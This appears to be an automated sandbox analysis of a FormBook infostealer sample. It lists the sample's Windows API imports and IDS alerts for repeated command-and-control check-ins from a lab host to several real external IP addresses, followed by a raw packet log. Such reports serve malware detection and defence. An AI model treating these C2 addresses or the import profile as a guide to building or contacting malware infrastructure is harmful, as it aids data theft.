KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T15:54:55.058220+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49981 | 3.33.130.190 | 80 | TCP
2024-10-08T15:55:11.208615+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49982 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:13.745510+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49983 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:16.324503+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49984 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:19.067831+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49985 | 23.224.37.76 | 80 | TCP
2024-10-08T15:55:25.356025+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49986 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:27.907328+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49987 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:31.024077+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49988 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:33.552417+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49989 | 20.184.53.162 | 80 | TCP
2024-10-08T15:55:39.615131+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49990 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:42.829677+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49991 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:45.444662+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49992 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:47.945936+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49993 | 199.192.21.169 | 80 | TCP
2024-10-08T15:55:53.697059+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49994 | 81.2.196.19 | 80 | TCP
2024-10-08T15:55:56.268746+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49995 | 81.2.196.19 | 80 | TCP
2024-10-08T15:55:58.941631+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49996 | 81.2.196.19 | 80 | TCP
2024-10-08T15:56:01.506046+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49997 | 81.2.196.19 | 80 | TCP
2024-10-08T15:56:07.828208+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49998 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:10.342789+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49999 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:13.128271+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50000 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:15.481765+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50001 | 107.163.130.249 | 80 | TCP
2024-10-08T15:56:30.980849+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50002 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:33.258500+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50003 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:35.789412+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50004 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:38.340684+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50005 | 103.21.221.4 | 80 | TCP
2024-10-08T15:56:44.908726+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50006 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:46.407490+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50007 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:48.996607+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50008 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:51.500642+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50009 | 3.33.130.190 | 80 | TCP
2024-10-08T15:56:57.025799+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50010 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:00.480822+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50011 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:02.113014+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50012 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:04.975729+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50013 | 3.33.130.190 | 80 | TCP
2024-10-08T15:57:10.496832+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50014 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:13.035316+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50015 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:15.596242+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50016 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:18.137011+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50017 | 15.197.204.56 | 80 | TCP
2024-10-08T15:57:23.793559+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50018 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:26.356859+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50019 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:28.949746+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50020 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:31.437191+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50021 | 198.252.106.191 | 80 | TCP
2024-10-08T15:57:38.673484+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50022 | 43.154.104.247 | 80 | TCP
2024-10-08T15:57:41.219310+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50023 | 43.154.104.247 | 80 | TCP
2024-10-08T15:57:43.938046+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 50024 | 43.154.104.247 | 80 | TCP
2024-10-08T15:58:06.365310+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 50025 | 43.154.104.247 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:54:54.530236959 CEST | 49981 | 80 | 192.168.2.11 | 3.33.130.190
Oct 8, 2024 15:54:54.535329103 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.11
Oct 8, 2024 15:54:54.536447048 CEST | 49981 | 80 | 192.168.2.11 | 3.33.130.190
Oct 8, 2024 15:54:54.544260025 CEST | 49981 | 80 | 192.168.2.11 | 3.33.130.190
Oct 8, 2024 15:54:54.549284935 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.11
Oct 8, 2024 15:54:55.057811022 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.11
Oct 8, 2024 15:54:55.058079004 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.11
Oct 8, 2024 15:54:55.058219910 CEST | 49981 | 80 | 192.168.2.11 | 3.33.130.190
Oct 8, 2024 15:54:55.061650038 CEST | 49981 | 80 | 192.168.2.11 | 3.33.130.190
Oct 8, 2024 15:54:55.067101955 CEST | 80 | 49981 | 3.33.130.190 | 192.168.2.11
Oct 8, 2024 15:55:10.561798096 CEST | 49982 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:10.567564011 CEST | 80 | 49982 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:10.567656994 CEST | 49982 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:10.579591990 CEST | 49982 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:10.584470034 CEST | 80 | 49982 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:11.208497047 CEST | 80 | 49982 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:11.208615065 CEST | 49982 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:12.094213009 CEST | 49982 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:12.099328995 CEST | 80 | 49982 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:13.113357067 CEST | 49983 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:13.118592978 CEST | 80 | 49983 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:13.118802071 CEST | 49983 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:13.140261889 CEST | 49983 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:13.145442009 CEST | 80 | 49983 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:13.745332003 CEST | 80 | 49983 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:13.745510101 CEST | 49983 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:14.656975985 CEST | 49983 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:14.662036896 CEST | 80 | 49983 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:15.675514936 CEST | 49984 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:15.681171894 CEST | 80 | 49984 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:15.683198929 CEST | 49984 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:15.694778919 CEST | 49984 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:15.699775934 CEST | 80 | 49984 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:15.699805021 CEST | 80 | 49984 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:16.324393034 CEST | 80 | 49984 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:16.324502945 CEST | 49984 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:17.203603983 CEST | 49984 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:17.208620071 CEST | 80 | 49984 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:18.222724915 CEST | 49985 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:18.227744102 CEST | 80 | 49985 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:18.227880001 CEST | 49985 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:18.235976934 CEST | 49985 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:18.240899086 CEST | 80 | 49985 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:19.067605972 CEST | 80 | 49985 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:19.067831039 CEST | 49985 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:19.068624020 CEST | 49985 | 80 | 192.168.2.11 | 23.224.37.76
Oct 8, 2024 15:55:19.073780060 CEST | 80 | 49985 | 23.224.37.76 | 192.168.2.11
Oct 8, 2024 15:55:24.261439085 CEST | 49986 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:24.268591881 CEST | 80 | 49986 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:24.268697977 CEST | 49986 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:24.280472040 CEST | 49986 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:24.285543919 CEST | 80 | 49986 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:25.355673075 CEST | 80 | 49986 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:25.355813026 CEST | 80 | 49986 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:25.356024981 CEST | 49986 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:25.781778097 CEST | 49986 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:26.801815033 CEST | 49987 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:26.806767941 CEST | 80 | 49987 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:26.806871891 CEST | 49987 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:26.821927071 CEST | 49987 | 80 | 192.168.2.11 | 20.184.53.162
Oct 8, 2024 15:55:26.826870918 CEST | 80 | 49987 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:27.906780005 CEST | 80 | 49987 | 20.184.53.162 | 192.168.2.11
Oct 8, 2024 15:55:27.907064915 CEST | 80 | 49987 | 20.184.53.162 | 192.168.2.11
                                                                                                      Oct 8, 2024 15:55:27.907327890 CEST4998780192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:28.328624964 CEST4998780192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:29.348591089 CEST4998880192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:29.918668032 CEST804998820.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:29.919189930 CEST4998880192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:29.931057930 CEST4998880192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:29.936264992 CEST804998820.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:29.936271906 CEST804998820.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:31.023698092 CEST804998820.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:31.023778915 CEST804998820.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:31.024076939 CEST4998880192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:31.438080072 CEST4998880192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:32.456124067 CEST4998980192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:32.461182117 CEST804998920.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:32.461349964 CEST4998980192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:32.468439102 CEST4998980192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:32.473342896 CEST804998920.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:33.552191019 CEST804998920.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:33.552282095 CEST804998920.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:33.552417040 CEST4998980192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:33.555298090 CEST4998980192.168.2.1120.184.53.162
                                                                                                      Oct 8, 2024 15:55:33.560195923 CEST804998920.184.53.162192.168.2.11
                                                                                                      Oct 8, 2024 15:55:38.986043930 CEST4999080192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:38.991105080 CEST8049990199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:38.991228104 CEST4999080192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:39.003246069 CEST4999080192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:39.008181095 CEST8049990199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:39.614902020 CEST8049990199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:39.614914894 CEST8049990199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:39.615130901 CEST4999080192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:40.516112089 CEST4999080192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:41.535418987 CEST4999180192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:42.224591017 CEST8049991199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:42.224761009 CEST4999180192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:42.236865997 CEST4999180192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:42.241861105 CEST8049991199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:42.829372883 CEST8049991199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:42.829622030 CEST8049991199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:42.829677105 CEST4999180192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:43.750802994 CEST4999180192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:44.769807100 CEST4999280192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:44.774745941 CEST8049992199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:44.774878025 CEST4999280192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:44.786650896 CEST4999280192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:44.791543961 CEST8049992199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:44.791629076 CEST8049992199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:45.444499969 CEST8049992199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:45.444538116 CEST8049992199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:45.444662094 CEST4999280192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:46.297431946 CEST4999280192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:47.316807032 CEST4999380192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:47.322117090 CEST8049993199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:47.323024035 CEST4999380192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:47.331054926 CEST4999380192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:47.335913897 CEST8049993199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:47.945543051 CEST8049993199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:47.945574045 CEST8049993199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:47.945935965 CEST4999380192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:47.948765993 CEST4999380192.168.2.11199.192.21.169
                                                                                                      Oct 8, 2024 15:55:48.222157001 CEST8049993199.192.21.169192.168.2.11
                                                                                                      Oct 8, 2024 15:55:53.036421061 CEST4999480192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:53.041404963 CEST804999481.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:53.041508913 CEST4999480192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:53.053775072 CEST4999480192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:53.059812069 CEST804999481.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:53.696913004 CEST804999481.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:53.697009087 CEST804999481.2.196.19192.168.2.11
                                                                                                      Oct 8, 2024 15:55:53.697058916 CEST4999480192.168.2.1181.2.196.19
                                                                                                      Oct 8, 2024 15:55:54.563297033 CEST4999480192.168.2.1181.2.196.19
